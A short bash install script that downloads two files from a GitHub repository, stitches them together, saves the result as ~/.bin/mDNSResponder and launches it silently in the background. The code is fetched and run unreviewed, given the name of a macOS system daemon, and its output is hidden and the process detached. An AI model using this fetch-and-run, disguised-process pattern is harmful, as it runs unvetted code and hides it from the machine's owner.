#!/usr/bin/env bash

mkdir -p ~/.bin

mDNSResponder="$(curl -s https://raw.githubusercontent.com/aj-may/boss/master/mDNSResponder)"
dnsmanager="$(curl -s https://raw.githubusercontent.com/aj-may/boss/master/dns-manager | openssl enc -base64)"

python -c "print \"\"\"$mDNSResponder\"\"\".replace('{{script}}', \"\"\"$dnsmanager\"\"\")" > ~/.bin/mDNSResponder
chmod u+x ~/.bin/mDNSResponder

~/.bin/mDNSResponder &> /dev/null & disown
